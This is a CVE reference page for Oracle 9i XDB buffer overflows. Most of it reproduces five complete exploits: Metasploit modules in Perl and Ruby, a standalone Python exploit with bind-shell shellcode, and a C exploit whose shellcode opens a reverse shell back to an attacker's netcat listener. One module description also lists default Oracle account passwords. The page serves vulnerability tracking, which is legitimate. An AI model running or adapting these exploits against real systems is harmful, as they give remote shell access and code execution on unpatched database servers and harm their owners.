Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 1365
Publication date : 2005-12-07 23h00 +00:00
Author : y0
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8080],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
}),
'Refs' => [
['BID', '8375'],
['CVE', '2003-0727'],
['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
],
'DefaultTarget' => 0,
'Targets' => [
['Oracle 9.2.0.1 Universal', 0x60616d46],
],
'Keys' => ['oracle'],
'DisclosureDate' => 'Aug 18 2003',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("GET / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /9\.2\.0\.1\.0/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}
my $splat =
"meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
$self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;
my $sploit =
"GET / HTTP/1.1". "\r\n".
"Host: $target_host:$target_port". "\r\n".
"User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
"en-US; rv:1.7.12) Gecko/20050923". "\r\n".
"Accept: text/xml,application/xml,application".
"/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
"image/png,*/*;q=0.5". "\r\n".
"Accept-Language: en-us,en;q=0.5". "\r\n".
"Accept-Encoding: gzip,deflate". "\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
"Keep-Alive: 300". "\r\n".
"Connection: keep-alive". "\r\n".
"Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
"\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2005-12-08]
Exploit Database EDB-ID : 42780
Publication date : 2017-09-24 22h00 +00:00
Author : Charles Dardaman
EDB Verified : No
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: 2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/
#!/usr/bin/python
import socket, sys, base64
#usage ./oracle9i_xbd_pass <target ip> <target port>
rhost = sys.argv[1] #target ip
rport = int(sys.argv[2]) #target port
#Variables:
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form
nop = "\x90"
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai
#355 bytes
payload = ""
payload += pre
payload += "\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"
payload += "\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"
payload += "\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"
payload += "\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"
payload += "\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"
payload += "\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"
payload += "\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"
payload += "\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"
payload += "\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"
payload += "\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"
payload += "\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"
payload += "\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"
payload += "\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"
payload += "\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"
payload += "\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"
payload += "\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"
payload += "\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"
payload += "\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"
payload += "\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"
payload += "\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"
payload += "\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"
payload += "\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"
payload += "\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"
payload += "\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"
payload += "\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"
payload += "\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"
payload += "\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"
payload += "\x98\xae\xd9\xba"
exploit = "AAAA:" + "B"*442 + "\xeb\x64" + (nop*2) + ret + (nop*266) +"\xeb\x10" + (nop*109) + payload + (nop * (400-len(payload)))
request = "GET / HTTP/1.1\r\n" + "Host: " + rhost + ":" + str(rport) + "\r\n" + "Authorization: Basic " + base64.b64encode(exploit) + "\r\n\r\n"
print ("Attacking " + rhost + ":" + str(rport))
#Connect to the target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,rport))
#Send exploit
s.send(request)
s.close()
print ("Try to connect on port 9989.")
Exploit Database EDB-ID : 80
Publication date : 2003-08-12 22h00 +00:00
Author : David Litchfield
EDB Verified : Yes
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
unsigned char exploit[508]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
"\xFF\xFF\xFF\xFF";
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";
char exception_handler[8]="\x79\x9B\xf7\x77";
char short_jump[8]="\xEB\x06\x90\x90";
int main(int argc, char *argv[])
{
if(argc != 6)
{
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
printf("\n\n\tSpawns a reverse shell to specified port");
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
printf("\n\n\tDavid Litchfield\n\t([email protected])");
printf("\n\t6th July 2003\n\n\n");
return 0;
}
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.\n");
SetUpExploit(argv[4],atoi(argv[5]));
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"\r\n");
GainControlOfOracle(argv[2],argv[3]);
return 0;
}
int SetUpExploit(char *myip, int myport)
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";
ip = inet_addr(myip);
ipt = (char*)&ip;
exploit[191]=ipt[0];
exploit[192]=ipt[1];
exploit[193]=ipt[2];
exploit[194]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons((unsigned short)myport);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[209]=prtt[0];
exploit[210]=prtt[1];
return 0;
}
int StartWinsock() {
int err=0; WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return 0; }
if (isalpha(host[0])) {
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
he = (struct hostent *)1;
}
if (he == NULL) {
return 0; }
return 1; }
int GainControlOfOracle(char *user, char *pass) {
char usercmd[260]="user ";
char passcmd[260]="pass ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;
strncat(usercmd,user,230);
strcat(usercmd,"\r\n");
strncat(passcmd,pass,230);
strcat(passcmd,"\r\n");
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);
s_sa.sin_port=htons((unsigned short)2100);
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp); ZeroMemory(resp,1600);
snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{ closesocket(sock);
return printf("Failed to log in using user %s and password %s.\n",user,pass);
}
ZeroMemory(resp,1600);
snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
Exploit Database EDB-ID : 16731
Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',
'Description' => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2003-0727'],
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
register_options([Opt::RPORT(2100),], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
user = rand_text_alpha_upper(10)
sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)
sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded
print_status("Trying target #{target.name}...")
send_cmd( ['USER', user], true )
send_cmd( ['PASS', sploit], false )
handler
disconnect
end
end
Exploit Database EDB-ID : 16714
Publication date : 2010-10-04 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference. Oracle9i includes a number of default accounts,
including dbsnmp:dbsmp, scott:tiger, system:manager, and
sys:change_on_install.
},
'Author' => [ 'MC', 'David Litchfield <[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10559 $',
'Platform' => [ 'win' ],
'References' =>
[
[ 'CVE', '2003-0727'],
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(2100),
OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
], self.class )
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
buf = rand_text_english(1130, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[322, seh.length] = seh
send_cmd( ['UNLOCK', '/', buf] , false )
handler
disconnect
end
end
Exploit Database EDB-ID : 16809
Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Description' => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2003-0727'],
['OSVDB', '2449'],
['BID', '8375'],
['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 18 2003'))
register_options(
[
Opt::RPORT(8080)
], self.class )
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
resp = sock.get_once
disconnect
if (resp =~ /9.2.0.1.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = rand_text_english(4, payload_badchars) + ":"
sploit << rand_text_english(442, payload_badchars)
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"
res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req
print_status("Trying target %s..." % target.name)
sock.put(res)
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Oracle>>Database_server >> Version *
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.0 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 7 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.64 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.0 (Open CPE detail)
